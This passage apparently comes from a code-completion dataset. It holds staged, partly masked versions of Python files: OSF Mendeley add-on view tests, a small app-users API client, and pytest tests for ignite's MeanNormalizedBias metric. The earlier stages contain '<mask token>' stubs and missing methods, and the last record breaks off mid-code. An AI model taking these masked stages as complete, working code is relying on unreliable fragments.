'mendeley_add_user_auth'), {'external_account_id': self.account\n ._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n assert_true(res.json['result']['userHasAuth'])\n assert_equal(self.node_addon.user_settings, self.user_addon)\n assert_equal(self.node_addon.external_account, self.account)\n\n def test_remove_user_auth(self):\n self.node_addon.set_auth(self.account, self.user)\n res = self.app.delete_json(self.project.api_url_for(\n 'mendeley_remove_user_auth'), {'external_account_id': self.\n account._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n self.node_addon.reload()\n assert_is_none(self.node_addon.user_settings)\n assert_is_none(self.node_addon.external_account)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n self.node_addon.associated_user_settings = []\n self.node_addon.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=self.user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=self.user_addon)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_not_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n user = AuthUserFactory()\n user.add_addon('mendeley')\n self.project.add_contributor(user)\n self.project.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=None)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n\n def test_mendeley_widget_view_complete(self):\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user\n =self.user))\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n assert_true(res['complete'])\n assert_equal(res['list_id'], 'ROOT-ID')\n\n def test_widget_view_incomplete(self):\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n assert_false(res['complete'])\n assert_is_none(res['list_id'])\n\n @httpretty.activate\n def test_mendeley_citation_list_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list'), auth=self.user.auth)\n root = res.json['contents'][0]\n assert_equal(root['kind'], 'folder')\n assert_equal(root['id'], 'ROOT')\n assert_equal(root['parent_list_id'], '__')\n\n @httpretty.activate\n def test_mendeley_citation_list_non_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=self.\n user.auth)\n children = res.json['contents']\n assert_equal(len(children), 7)\n assert_equal(children[0]['kind'], 'folder')\n assert_equal(children[1]['kind'], 'file')\n assert_true(children[1].get('csl') is not None)\n\n @httpretty.activate\n def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self):\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n self.node_addon.mendeley_list_id = (\n 'e843da05-8818-47c2-8c37-41eebfc4fe3f')\n self.node_addon.save()\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=\n non_authorizing_user.auth, expect_errors=True)\n assert_equal(res.status_code, 403)\n", "step-5": "# -*- coding: utf-8 -*-\nfrom nose.tools import * # noqa\n\nimport mock\nimport httpretty\n\nfrom tests.base import OsfTestCase\nfrom tests.factories import AuthUserFactory, ProjectFactory\n\nimport urlparse\n\nfrom framework.auth import Auth\n\nfrom website.addons.mendeley.tests.factories import (\n MendeleyAccountFactory,\n MendeleyUserSettingsFactory,\n MendeleyNodeSettingsFactory\n)\n\nfrom framework.exceptions import HTTPError\nfrom website.addons.mendeley.provider import MendeleyCitationsProvider\nfrom website.addons.mendeley.serializer import MendeleySerializer\n\nfrom utils import mock_responses\n\nAPI_URL = 'https://api.mendeley.com'\n\nclass MockNode(object):\n\n addon = None\n\n @property\n def is_deleted(self):\n return False\n\n @property\n def is_public(self):\n return True\n\n def get_addon(self, name):\n if name == 'mendeley':\n return self.addon\n return None\n\nclass MockFolder(object):\n def __init__(self, **kwargs):\n for k, v in kwargs.iteritems():\n setattr(self, k, v)\n\nclass MendeleyViewsTestCase(OsfTestCase):\n\n def setUp(self):\n super(MendeleyViewsTestCase, self).setUp()\n self.account = MendeleyAccountFactory()\n self.user = AuthUserFactory(external_accounts=[self.account])\n self.account.display_name = self.user.fullname\n self.account.save()\n self.user_addon = MendeleyUserSettingsFactory(owner=self.user, external_account=self.account)\n self.project = ProjectFactory(creator=self.user)\n self.node_addon = MendeleyNodeSettingsFactory(owner=self.project)\n self.node_addon.set_auth(external_account=self.account, user=self.user)\n self.provider = MendeleyCitationsProvider()\n #self.user_addon.grant_oauth_access(self.node_addon, self.account, metadata={'lists': 'list'})\n self.node = MockNode()\n self.node.addon = self.node_addon\n self.id_patcher = mock.patch('website.addons.mendeley.model.Mendeley.client_id')\n self.secret_patcher = mock.patch('website.addons.mendeley.model.Mendeley.client_secret')\n self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.id_patcher.start()\n self.secret_patcher.start()\n\n def tearDown(self):\n self.id_patcher.stop()\n self.secret_patcher.stop()\n\n @mock.patch('website.addons.mendeley.model.Mendeley.client', new_callable=mock.PropertyMock)\n def test_check_mendeley_credentials(self, mock_client):\n mock_client.side_effect = HTTPError(403)\n assert_false(self.provider.check_credentials(self.node_addon))\n\n mock_client.side_effect = HTTPError(402)\n with assert_raises(HTTPError):\n self.provider.check_credentials(self.node_addon)\n\n @mock.patch('website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials')\n def test_serialize_settings_authorizer(self, mock_credentials):\n #\"\"\"dict: a serialized version of user-specific addon settings\"\"\"\n mock_credentials.return_value = True\n res = self.app.get(\n self.project.api_url_for('mendeley_get_config'),\n auth=self.user.auth,\n )\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_true(result['userHasAuth'])\n assert_true(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch('website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials')\n def test_serialize_settings_non_authorizer(self, mock_credentials):\n #\"\"\"dict: a serialized version of user-specific addon settings\"\"\"\n mock_credentials.return_value = True\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n res = self.app.get(\n self.project.api_url_for('mendeley_get_config'),\n auth=non_authorizing_user.auth,\n )\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_false(result['userHasAuth'])\n assert_false(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch('website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials')\n def test_set_auth(self, mock_credentials):\n\n mock_credentials.return_value = True\n res = self.app.put_json(\n self.project.api_url_for('mendeley_add_user_auth'),\n {\n 'external_account_id': self.account._id,\n },\n auth=self.user.auth,\n )\n\n assert_equal(\n res.status_code,\n 200\n )\n\n assert_true(res.json['result']['userHasAuth'])\n\n assert_equal(\n self.node_addon.user_settings,\n self.user_addon\n )\n assert_equal(\n self.node_addon.external_account,\n self.account\n )\n\n def test_remove_user_auth(self):\n self.node_addon.set_auth(self.account, self.user)\n\n res = self.app.delete_json(\n self.project.api_url_for('mendeley_remove_user_auth'),\n {\n 'external_account_id': self.account._id,\n },\n auth=self.user.auth,\n )\n\n assert_equal(\n res.status_code,\n 200\n )\n\n self.node_addon.reload()\n\n assert_is_none(self.node_addon.user_settings)\n assert_is_none(self.node_addon.external_account)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n # Settings config updates node settings\n self.node_addon.associated_user_settings = []\n self.node_addon.save()\n res = self.app.put_json(\n self.project.api_url_for('mendeley_set_config'),\n {\n 'external_account_id': self.account._id,\n 'external_list_id': 'list',\n },\n auth=self.user.auth,\n )\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon, user_settings=self.user_addon)\n expected = {\n 'result': serializer.serialized_node_settings\n }\n assert_equal(res.json, expected)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_not_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n user = AuthUserFactory()\n user.add_addon('mendeley')\n self.project.add_contributor(user)\n self.project.save()\n res = self.app.put_json(\n self.project.api_url_for('mendeley_set_config'),\n {\n 'external_account_id': self.account._id,\n 'external_list_id': 'list',\n },\n auth=user.auth,\n )\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon, user_settings=None)\n expected = {\n 'result': serializer.serialized_node_settings\n }\n assert_equal(res.json, expected)\n\n def test_mendeley_widget_view_complete(self):\n # JSON: everything a widget needs\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user=self.user))\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n\n assert_true(res['complete'])\n assert_equal(res['list_id'], 'ROOT-ID')\n\n def test_widget_view_incomplete(self):\n # JSON: tell the widget when it hasn't been configured\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n\n assert_false(res['complete'])\n assert_is_none(res['list_id'])\n\n @httpretty.activate\n def test_mendeley_citation_list_root(self):\n\n httpretty.register_uri(\n httpretty.GET,\n urlparse.urljoin(API_URL, 'folders'),\n body=mock_responses['folders'],\n content_type='application/json'\n )\n\n res = self.app.get(\n self.project.api_url_for('mendeley_citation_list'),\n auth=self.user.auth\n )\n root = res.json['contents'][0]\n assert_equal(root['kind'], 'folder')\n assert_equal(root['id'], 'ROOT')\n assert_equal(root['parent_list_id'], '__')\n\n @httpretty.activate\n def test_mendeley_citation_list_non_root(self):\n\n httpretty.register_uri(\n httpretty.GET,\n urlparse.urljoin(API_URL, 'folders'),\n body=mock_responses['folders'],\n content_type='application/json'\n )\n\n httpretty.register_uri(\n httpretty.GET,\n urlparse.urljoin(API_URL, 'documents'),\n body=mock_responses['documents'],\n content_type='application/json'\n )\n\n res = self.app.get(\n self.project.api_url_for('mendeley_citation_list', mendeley_list_id='ROOT'),\n auth=self.user.auth\n )\n\n children = res.json['contents']\n assert_equal(len(children), 7)\n assert_equal(children[0]['kind'], 'folder')\n assert_equal(children[1]['kind'], 'file')\n assert_true(children[1].get('csl') is not None)\n\n @httpretty.activate\n def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self):\n\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n\n self.node_addon.mendeley_list_id = 'e843da05-8818-47c2-8c37-41eebfc4fe3f'\n self.node_addon.save()\n\n httpretty.register_uri(\n httpretty.GET,\n urlparse.urljoin(API_URL, 'folders'),\n body=mock_responses['folders'],\n content_type='application/json'\n )\n\n httpretty.register_uri(\n httpretty.GET,\n urlparse.urljoin(API_URL, 'documents'),\n body=mock_responses['documents'],\n content_type='application/json'\n )\n\n res = self.app.get(\n self.project.api_url_for('mendeley_citation_list', mendeley_list_id='ROOT'),\n auth=non_authorizing_user.auth,\n expect_errors=True\n )\n assert_equal(res.status_code, 403)\n", "step-ids": [ 11, 14, 16, 20, 25 ] }
[ 11, 14, 16, 20, 25 ]
# -*- coding: utf-8 -*- from qav5.http.client import BaseClient from qav5.http.helper import api from qav5.utils import Bunch, low_case_to_camelcase class AppusersClient(BaseClient): def __init__(self, base_url, access_token=None, **kwargs): super().__init__(base_url, kwargs) self.access_token = access_token self.req_kwargs.update({"headers": {"Authorization": self.access_token}}) self.interceptor = lambda r, j: Bunch(j) @api(rule="/app_users/app_order_create_info", method="get", is_json_req=True) def app_order_create_info(self,order_id:int=None): """ 订单创建个人账号页信息 :return: """ def contract_upload_for_user(self, sub_firm_id, contract_file): """ 单个创建账号的合同文件 :param contract_file: 合同文件 :param sub_firm_id: 公司id :return: """ return self._call_api("/app_users/contract_upload", method='POST', req_kwargs=dict(data={"sub_firm_id": sub_firm_id}, files=dict(contract_file=open(contract_file, 'rb'))), disable_log=True) @api(rule="/app_users/setting", is_json_req=True) def app_users_setting(self,id): """ 账号编辑设置 :param id: 个人账号id :return: """ @api(rule="/app_users/set_allot_admin", is_json_req=True, remove_null=True) def set_allot_admin(self, app_user_ids, allot_admin): """ 设置分配管理员 :param app_user_ids:个人账号IDs 的数组 :param allot_admin:设置分配管理员,(0:否|1:是) :return: """ pass
normal
{ "blob_id": "1af6bda6eb4e7a46b22379180ea82e78c67ce771", "index": 4269, "step-1": "<mask token>\n\n\nclass AppusersClient(BaseClient):\n <mask token>\n\n @api(rule='/app_users/app_order_create_info', method='get', is_json_req\n =True)\n def app_order_create_info(self, order_id: int=None):\n \"\"\"\n 订单创建个人账号页信息\n :return:\n \"\"\"\n <mask token>\n <mask token>\n\n @api(rule='/app_users/set_allot_admin', is_json_req=True, remove_null=True)\n def set_allot_admin(self, app_user_ids, allot_admin):\n \"\"\"\n 设置分配管理员\n :param app_user_ids:个人账号IDs 的数组\n :param allot_admin:设置分配管理员,(0:否|1:是)\n :return:\n \"\"\"\n pass\n", "step-2": "<mask token>\n\n\nclass AppusersClient(BaseClient):\n\n def __init__(self, base_url, access_token=None, **kwargs):\n super().__init__(base_url, kwargs)\n self.access_token = access_token\n self.req_kwargs.update({'headers': {'Authorization': self.\n access_token}})\n self.interceptor = lambda r, j: Bunch(j)\n\n @api(rule='/app_users/app_order_create_info', method='get', is_json_req\n =True)\n def app_order_create_info(self, order_id: int=None):\n \"\"\"\n 订单创建个人账号页信息\n :return:\n \"\"\"\n <mask token>\n <mask token>\n\n @api(rule='/app_users/set_allot_admin', is_json_req=True, remove_null=True)\n def set_allot_admin(self, app_user_ids, allot_admin):\n \"\"\"\n 设置分配管理员\n :param app_user_ids:个人账号IDs 的数组\n :param allot_admin:设置分配管理员,(0:否|1:是)\n :return:\n \"\"\"\n pass\n", "step-3": "<mask token>\n\n\nclass AppusersClient(BaseClient):\n\n def __init__(self, base_url, access_token=None, **kwargs):\n super().__init__(base_url, kwargs)\n self.access_token = access_token\n self.req_kwargs.update({'headers': {'Authorization': self.\n access_token}})\n self.interceptor = lambda r, j: Bunch(j)\n\n @api(rule='/app_users/app_order_create_info', method='get', is_json_req\n =True)\n def app_order_create_info(self, order_id: int=None):\n \"\"\"\n 订单创建个人账号页信息\n :return:\n \"\"\"\n\n def contract_upload_for_user(self, sub_firm_id, contract_file):\n \"\"\"\n 单个创建账号的合同文件\n :param contract_file: 合同文件\n :param sub_firm_id: 公司id\n :return:\n \"\"\"\n return self._call_api('/app_users/contract_upload', method='POST',\n req_kwargs=dict(data={'sub_firm_id': sub_firm_id}, files=dict(\n contract_file=open(contract_file, 'rb'))), disable_log=True)\n\n @api(rule='/app_users/setting', is_json_req=True)\n def app_users_setting(self, id):\n \"\"\"\n 账号编辑设置\n :param id: 个人账号id\n :return:\n \"\"\"\n\n @api(rule='/app_users/set_allot_admin', is_json_req=True, remove_null=True)\n def set_allot_admin(self, app_user_ids, allot_admin):\n \"\"\"\n 设置分配管理员\n :param app_user_ids:个人账号IDs 的数组\n :param allot_admin:设置分配管理员,(0:否|1:是)\n :return:\n \"\"\"\n pass\n", "step-4": "from qav5.http.client import BaseClient\nfrom qav5.http.helper import api\nfrom qav5.utils import Bunch, low_case_to_camelcase\n\n\nclass AppusersClient(BaseClient):\n\n def __init__(self, base_url, access_token=None, **kwargs):\n super().__init__(base_url, kwargs)\n self.access_token = access_token\n self.req_kwargs.update({'headers': {'Authorization': self.\n access_token}})\n self.interceptor = lambda r, j: Bunch(j)\n\n @api(rule='/app_users/app_order_create_info', method='get', is_json_req\n =True)\n def app_order_create_info(self, order_id: int=None):\n \"\"\"\n 订单创建个人账号页信息\n :return:\n \"\"\"\n\n def contract_upload_for_user(self, sub_firm_id, contract_file):\n \"\"\"\n 单个创建账号的合同文件\n :param contract_file: 合同文件\n :param sub_firm_id: 公司id\n :return:\n \"\"\"\n return self._call_api('/app_users/contract_upload', method='POST',\n req_kwargs=dict(data={'sub_firm_id': sub_firm_id}, files=dict(\n contract_file=open(contract_file, 'rb'))), disable_log=True)\n\n @api(rule='/app_users/setting', is_json_req=True)\n def app_users_setting(self, id):\n \"\"\"\n 账号编辑设置\n :param id: 个人账号id\n :return:\n \"\"\"\n\n @api(rule='/app_users/set_allot_admin', is_json_req=True, remove_null=True)\n def set_allot_admin(self, app_user_ids, allot_admin):\n \"\"\"\n 设置分配管理员\n :param app_user_ids:个人账号IDs 的数组\n :param allot_admin:设置分配管理员,(0:否|1:是)\n :return:\n \"\"\"\n pass\n", "step-5": "# -*- coding: utf-8 -*-\n\nfrom qav5.http.client import BaseClient\nfrom qav5.http.helper import api\nfrom qav5.utils import Bunch, low_case_to_camelcase\n\n\nclass AppusersClient(BaseClient):\n def __init__(self, base_url, access_token=None, **kwargs):\n super().__init__(base_url, kwargs)\n self.access_token = access_token\n self.req_kwargs.update({\"headers\": {\"Authorization\": self.access_token}})\n self.interceptor = lambda r, j: Bunch(j)\n\n @api(rule=\"/app_users/app_order_create_info\", method=\"get\", is_json_req=True)\n def app_order_create_info(self,order_id:int=None):\n \"\"\"\n 订单创建个人账号页信息\n :return:\n \"\"\"\n\n def contract_upload_for_user(self, sub_firm_id, contract_file):\n \"\"\"\n 单个创建账号的合同文件\n :param contract_file: 合同文件\n :param sub_firm_id: 公司id\n :return:\n \"\"\"\n return self._call_api(\"/app_users/contract_upload\", method='POST',\n req_kwargs=dict(data={\"sub_firm_id\": sub_firm_id},\n files=dict(contract_file=open(contract_file, 'rb'))),\n disable_log=True)\n\n @api(rule=\"/app_users/setting\", is_json_req=True)\n def app_users_setting(self,id):\n \"\"\"\n 账号编辑设置\n :param id: 个人账号id\n :return:\n \"\"\"\n\n @api(rule=\"/app_users/set_allot_admin\", is_json_req=True, remove_null=True)\n def set_allot_admin(self, app_user_ids, allot_admin):\n \"\"\"\n 设置分配管理员\n :param app_user_ids:个人账号IDs 的数组\n :param allot_admin:设置分配管理员,(0:否|1:是)\n :return:\n \"\"\"\n pass\n", "step-ids": [ 3, 4, 6, 7, 8 ] }
[ 3, 4, 6, 7, 8 ]
import numpy as np import pytest import torch from ignite.contrib.metrics.regression import MeanNormalizedBias from ignite.engine import Engine from ignite.exceptions import NotComputableError def test_zero_sample(): m = MeanNormalizedBias() with pytest.raises( NotComputableError, match=r"MeanNormalizedBias must have at least one example before it can be computed" ): m.compute() def test_zero_gt(): a = np.random.randn(4) ground_truth = np.zeros(4) m = MeanNormalizedBias() with pytest.raises(NotComputableError, match=r"The ground truth has 0."): m.update((torch.from_numpy(a), torch.from_numpy(ground_truth))) def test_wrong_input_shapes(): m = MeanNormalizedBias() with pytest.raises(ValueError, match=r"Input data shapes should be the same, but given"): m.update((torch.rand(4, 1, 2), torch.rand(4, 1))) with pytest.raises(ValueError, match=r"Input data shapes should be the same, but given"): m.update((torch.rand(4, 1), torch.rand(4, 1, 2))) with pytest.raises(ValueError, match=r"Input data shapes should be the same, but given"): m.update((torch.rand(4, 1, 2), torch.rand(4,),)) with pytest.raises(ValueError, match=r"Input data shapes should be the same, but given"): m.update((torch.rand(4,), torch.rand(4, 1, 2),)) def test_mean_error(): a = np.random.randn(4) b = np.random.randn(4) c = np.random.randn(4) d = np.random.randn(4) ground_truth = np.random.randn(4) m = MeanNormalizedBias() m.update((torch.from_numpy(a), torch.from_numpy(ground_truth))) np_sum = ((ground_truth - a) / ground_truth).sum() np_len = len(a) np_ans = np_sum / np_len assert m.compute() == pytest.approx(np_ans) m.update((torch.from_numpy(b), torch.from_numpy(ground_truth))) np_sum += ((ground_truth - b) / ground_truth).sum() np_len += len(b) np_ans = np_sum / np_len assert m.compute() == pytest.approx(np_ans) m.update((torch.from_numpy(c), torch.from_numpy(ground_truth))) np_sum += ((ground_truth - c) / ground_truth).sum() np_len += len(c) np_ans = np_sum / np_len assert m.compute() == pytest.approx(np_ans) m.update((torch.from_numpy(d), torch.from_numpy(ground_truth))) np_sum += ((ground_truth - d) / ground_truth).sum() np_len += len(d) np_ans = np_sum / np_len assert m.compute() == pytest.approx(np_ans) def test_integration(): def _test(y_pred, y, batch_size): def update_fn(engine, batch): idx = (engine.state.iteration - 1) * batch_size y_true_batch = np_y[idx : idx + batch_size] y_pred_batch = np_y_pred[idx : idx + batch_size] return torch.from_numpy(y_pred_batch), torch.from_numpy(y_true_batch) engine = Engine(update_fn) m = MeanNormalizedBias() m.attach(engine, "mnb") np_y = y.numpy() np_y_pred = y_pred.numpy() data = list(range(y_pred.shape[0] // batch_size)) mnb = engine.run(data, max_epochs=1).metrics["mnb"] np_sum = ((np_y - np_y_pred) / np_y).sum() np_len = len(np_y_pred) np_ans = np_sum / np_len assert np_ans == pytest.approx(mnb) def get_test_cases(): test_cases = [ (torch.rand(size=(100,)), torch.rand(size=(100,)), 10), (torch.rand(size=(200,)), torch.rand(size=(200,)), 10), (torch.rand(size=(100,)), torch.rand(size=(100,)), 20), (torch.rand(size=(200,)), torch.rand(size=(200,)), 20), ] return test_cases for _ in range(10): # check multiple random inputs as random exact occurencies are rare test_cases = get_test_cases() for y_pred, y, batch_size in test_cases: _test(y_pred, y, batch_size)
normal
{ "blob_id": "452f35fe2ae9609949a3f92ad7768fc37094a2f1", "index": 3786, "step-1": "<mask token>\n\n\ndef test_zero_sample():\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match=\n 'MeanNormalizedBias must have at least one example before it can be computed'\n ):\n m.compute()\n\n\ndef test_zero_gt():\n a = np.random.randn(4)\n ground_truth = np.zeros(4)\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match='The ground truth has 0.'):\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n\n\ndef test_wrong_input_shapes():\n m = MeanNormalizedBias()\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4, 1)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1), torch.rand(4, 1, 2)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4), torch.rand(4, 1, 2)))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef test_zero_sample():\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match=\n 'MeanNormalizedBias must have at least one example before it can be computed'\n ):\n m.compute()\n\n\ndef test_zero_gt():\n a = np.random.randn(4)\n ground_truth = np.zeros(4)\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match='The ground truth has 0.'):\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n\n\ndef test_wrong_input_shapes():\n m = MeanNormalizedBias()\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4, 1)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1), torch.rand(4, 1, 2)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4), torch.rand(4, 1, 2)))\n\n\n<mask token>\n\n\ndef test_integration():\n\n def _test(y_pred, y, batch_size):\n\n def update_fn(engine, batch):\n idx = (engine.state.iteration - 1) * batch_size\n y_true_batch = np_y[idx:idx + batch_size]\n y_pred_batch = np_y_pred[idx:idx + batch_size]\n return torch.from_numpy(y_pred_batch), torch.from_numpy(\n y_true_batch)\n engine = Engine(update_fn)\n m = MeanNormalizedBias()\n m.attach(engine, 'mnb')\n np_y = y.numpy()\n np_y_pred = y_pred.numpy()\n data = list(range(y_pred.shape[0] // batch_size))\n mnb = engine.run(data, max_epochs=1).metrics['mnb']\n np_sum = ((np_y - np_y_pred) / np_y).sum()\n np_len = len(np_y_pred)\n np_ans = np_sum / np_len\n assert np_ans == pytest.approx(mnb)\n\n def get_test_cases():\n test_cases = [(torch.rand(size=(100,)), torch.rand(size=(100,)), 10\n ), (torch.rand(size=(200,)), torch.rand(size=(200,)), 10), (\n torch.rand(size=(100,)), torch.rand(size=(100,)), 20), (torch.\n rand(size=(200,)), torch.rand(size=(200,)), 20)]\n return test_cases\n for _ in range(10):\n test_cases = get_test_cases()\n for y_pred, y, batch_size in test_cases:\n _test(y_pred, y, batch_size)\n", "step-3": "<mask token>\n\n\ndef test_zero_sample():\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match=\n 'MeanNormalizedBias must have at least one example before it can be computed'\n ):\n m.compute()\n\n\ndef test_zero_gt():\n a = np.random.randn(4)\n ground_truth = np.zeros(4)\n m = MeanNormalizedBias()\n with pytest.raises(NotComputableError, match='The ground truth has 0.'):\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n\n\ndef test_wrong_input_shapes():\n m = MeanNormalizedBias()\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4, 1)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1), torch.rand(4, 1, 2)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4, 1, 2), torch.rand(4)))\n with pytest.raises(ValueError, match=\n 'Input data shapes should be the same, but given'):\n m.update((torch.rand(4), torch.rand(4, 1, 2)))\n\n\ndef test_mean_error():\n a = np.random.randn(4)\n b = np.random.randn(4)\n c = np.random.randn(4)\n d = np.random.randn(4)\n ground_truth = np.random.randn(4)\n m = MeanNormalizedBias()\n m.update((torch.from_numpy(a), torch.from_numpy(ground_truth)))\n np_sum = ((ground_truth - a) / ground_truth).sum()\n np_len = len(a)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(b), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - b) / ground_truth).sum()\n np_len += len(b)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(c), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - c) / ground_truth).sum()\n np_len += len(c)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n m.update((torch.from_numpy(d), torch.from_numpy(ground_truth)))\n np_sum += ((ground_truth - d) / ground_truth).sum()\n np_len += len(d)\n np_ans = np_sum / np_len\n assert m.compute() == pytest.approx(np_ans)\n\n\ndef test_integration():\n\n def _test(y_pred, y, batch_size):\n\n def update_fn(engine, batch):\n idx = (engine.state.iteration - 1) * batch_size\n y_true_batch = np_y[idx:idx + batch_size]\n y_pred_batch = np_y_pred[idx:idx + batch_size]\n return torch.from_numpy(y_pred_batch), torch.from_numpy(\n y_true_batch)\n engine = Engine(update_fn)\n m = MeanNormalizedBias()\n m.attach(engine, 'mnb')\n np_y = y.numpy()\n np_y_pred = y_pred.numpy()\n data = list(range(y_pred.shape[0] // batch_size))\n mnb = engine.run(data, max_epochs=1).metrics['mnb']\n np_sum = ((np_y - np_y_pred) / np_y).sum()\n np_len = len(np_y_pred)\n np_ans = np_sum / np_len\n assert np_ans == pytest.approx(mnb)\n\n def get_test_cases():\n test_cases = [(torch.rand(size=(100,)), torch.rand(size=(100,)), 10\n ), (torch.rand(size=(200,)), torch.rand(size=(200,)), 10), (\n torch.rand(size=(100,)), torch.rand(size=(100,)), 20), (torch.\n rand(size=(200,)), torch.rand(size=(200,)), 20)]\n return 